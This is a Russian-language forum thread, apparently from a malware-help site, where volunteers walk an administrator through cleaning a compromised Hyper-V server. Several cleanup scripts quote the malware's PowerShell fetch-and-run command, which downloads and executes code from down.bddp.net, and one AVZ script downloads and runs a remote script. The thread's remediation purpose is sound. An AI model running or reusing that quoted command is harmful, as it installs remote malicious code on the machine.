На виртуалке не снять лог по правилам. Сделал как рекомендовали в этой теме - http://forum.oszone.net/thread-342410.html

Доброго дня. Что за виртуалка и почему не удалось собрать логи? Откат точки не рассматриваете?

Точнее это не виртуалка, а сам хост сервер - Hyper-v core.
Лог не удаётся собрать потому что пишет что подключен по РДП. Откат не рассматривал.

пишет что подключен по РДП »
Да, логи нужно снимать непосредственно на сервере, а не через терминальное подключение.
Кстати, пароли на RDP смените.

Закройте все программы, временно выгрузите антивирус, файрволл и прочее защитное ПО (https://safezone.cc/threads/18577/).
Откройте папку с распакованной утилитой uVS и запустите файл start.exe. В открывшимся окне выберите пункт "Запустить под текущим пользователем".
Выделите и правой кнопкой мыши скопируйте следующий скрипт в буфер обмена:

;uVS v4.1.8 [http://dsrt.dyndns.org:8888]
;Target OS: NTv6.3
v400c
;---------command-block---------
deltsk %Sys32%\WINDOWSPOWERSHELL\V1.0\POWERSHELL.EXE
apply

В uVS выберите пункт меню "Скрипт" => "Выполнить скрипт находящийся в буфере обмена..."
Нажмите на кнопку "Выполнить" и дождитесь окончания работы программы. Перезагрузите компьютер вручную.

Подробнее читайте в этом руководстве (https://safezone.cc/threads/14509/#post-79352).


Проверьте уязвимые места:
Выполните скрипт в AVZ (http://forum.oszone.net/post-1430637-4.html) при наличии доступа в интернет:

var
LogPath : string;
ScriptPath : string;
begin
LogPath := GetAVZDirectory + 'log\avz_log.txt';
if FileExists(LogPath) Then DeleteFile(LogPath);
ScriptPath := GetAVZDirectory +'ScanVuln.txt';
if DownloadFile('http://dataforce.ru/~kad/ScanVuln.txt', ScriptPath, 1) then ExecuteScript(ScriptPath) else
begin
if DownloadFile('http://dataforce.ru/~kad/ScanVuln.txt', ScriptPath, 0) then ExecuteScript(ScriptPath)
else begin
ShowMessage('Невозможно загрузить скрипт AVZ для обнаружения наиболее часто используемых уязвимостей!');
exit;
end;
end;
if FileExists(LogPath) Then ExecuteFile('notepad.exe', LogPath, 1, 0, false)
end.

После его работы, если будут найдены уязвимости, в блокноте откроется файл avz_log.txt со ссылками на обновления системы и критичных к безопасности программ, которые нужно загрузить и установить.
В первую очередь это относится к браузерам, Java, Adobe Acrobat/Reader и Adobe Flash Player.

Пройдитесь по ссылкам из файла avz_log.txt и установите все рекомендуемые обновления (если таковые будут).
Перезагрузите компьютер.
Снова выполните этот скрипт и убедитесь, что уязвимости устранены.

Спасибо.
1) Почему нужно менять пароль RDP?
2) Когда первый скрипт выполнен он выдаст какое то сообщение?
3) Второй скрипт сообщил что ни каких уязвимостей нет.
4) Выполнил первый скрипт через некоторое время опять процессы powershell - скриншот во вложении

Почему нужно менять пароль RDP? »
Не исключено, что проникновение вредоноса происходит через взломанный пароль.

Когда первый скрипт выполнен он выдаст какое то сообщение? »
Нет.

через некоторое время опять процессы powershell »
Соберите свежий образ автозапуска uVS.

Раньше CureIt видел вирусную задачу, сейчас не видит.
Лог во вложении.

Закройте все программы, временно выгрузите антивирус, файрволл и прочее защитное ПО (https://safezone.cc/threads/18577/).
Откройте папку с распакованной утилитой uVS и запустите файл start.exe. В открывшимся окне выберите пункт "Запустить под текущим пользователем".
Выделите и правой кнопкой мыши скопируйте следующий скрипт в буфер обмена:

;uVS v4.1.8 [http://dsrt.dyndns.org:8888]
;Target OS: NTv6.3
v400c
;---------command-block---------
delref IEX (NEW-OBJECT NET.WEBCLIENT).DOWNLOADSTRING('HTTP://DOWN.BDDP.NET/NEWOL.DAT?ALLV6&MAC=&AV=&VERSION=6.3.9600&BIT=64-BIT&FLAG2=TRUE&DOMAIN=HARD.NOV&USER=HPV9$&PS=TRUE')
delref %SystemDrive%\USERS\ITADMIN\APPDATA\LOCAL\TEMP\2\C94D3D10-F112B2E2-596AD9FA-E298B03A\150968B4D.SYS
delref %SystemDrive%\USERS\ITADMIN\APPDATA\LOCAL\TEMP\2\6267A36F-6CDFBD31-39CB72-2B244C2F\259D075B19.SYS
delref %SystemDrive%\USERS\ITADMIN\APPDATA\LOCAL\TEMP\2\AA44598C-D124EA12-25B37650-C44382F9\3B1A5F71A35.SYS
delref %SystemDrive%\USERS\ITADMIN\APPDATA\LOCAL\TEMP\2\E3B9B7B4-32056DB4-4A0C5244-4FB3A0DC\8ED1CEBB1B.SYS
delref %SystemDrive%\USERS\ITADMIN\APPDATA\LOCAL\TEMP\2\8EF1EB8017.SYS
delref %SystemDrive%\USERS\ITADMIN\APPDATA\LOCAL\TEMP\2\13ECE9FC-627FA9C8-8762782E-E41DE93C\C94D31C4.SYS
delref 752073A1-23F2-4396-85F0-8FDB879ED0ED\[CLSID]
apply

deltmp

В uVS выберите пункт меню "Скрипт" => "Выполнить скрипт находящийся в буфере обмена..."
Нажмите на кнопку "Выполнить" и дождитесь окончания работы программы. Перегрузите компьютер вручную.

Подробнее читайте в этом руководстве (https://safezone.cc/threads/14509/#post-79352).

Соберите еще раз образ автозапуска uVS (AutorunsVTChecker уже не нужно запускать).

Спасибо.
Во вложении.

Лог выглядит хорошо. Проблема решена?

Нет(

Скачайте Malwarebytes' Anti-Malware (https://downloads.malwarebytes.com/file/mb3/). Установите и запустите.
На вкладке "Проверка" - "Полная проверка" нажмите кнопку "Начать проверку". Дождитесь её окончания.
Самостоятельно ничего не удаляйте!!!
Нажмите кнопку "Сохранить результат - Текстовый файл (*.txt)". Имя сохраняемому файлу дайте любое, например, "scan".
Отчёт прикрепите к сообщению.
Подробнее читайте в руководстве. (https://safezone.cc/threads/28958/)

У меня сервер Hyper-v Core на нём нельзя устанавливать. Не устанавливая можно запустить?

Берём тайм-аут пока.

ок, спс. Жду

Закройте все программы, временно выгрузите антивирус, файрволл и прочее защитное ПО (https://safezone.cc/threads/18577/).
Откройте папку с распакованной утилитой uVS и запустите файл start.exe. В открывшимся окне выберите пункт "Запустить под текущим пользователем".
Выделите и правой кнопкой мыши скопируйте следующий скрипт в буфер обмена:

;uVS v4.1.8 [http://dsrt.dyndns.org:8888]
;Target OS: NTv6.3
v400c
deltsk %Sys32%\WINDOWSPOWERSHELL\V1.0\POWERSHELL.EXE
delref IEX (NEW-OBJECT NET.WEBCLIENT).DOWNLOADSTRING('HTTP://down.bddp.net/NEWOL.DAT?ALLV6&MAC=&AV=&VERSION=6.3.9600&BIT=64-BIT&FLAG2=TRUE&DOMAIN=HARD.NOV&USER=HPV9$&PS=TRUE')
apply

В uVS выберите пункт меню "Скрипт" => "Выполнить скрипт находящийся в буфере обмена..."
Нажмите на кнопку "Выполнить" и дождитесь окончания работы программы. Перезагрузите компьютер вручную.

Подробнее читайте в этом руководстве (https://safezone.cc/threads/14509/#post-79352).


Ещё раз сделайте образ автозапуска uVS.

(((

Коллеги подсказывают, что скрипт AVZ (по уязвимостям) может не все показать. Поэтому ставьте все доступные обновления.
А также:

по сетке или снаружи лезет.
Или просто по сети с правами админа навешивают.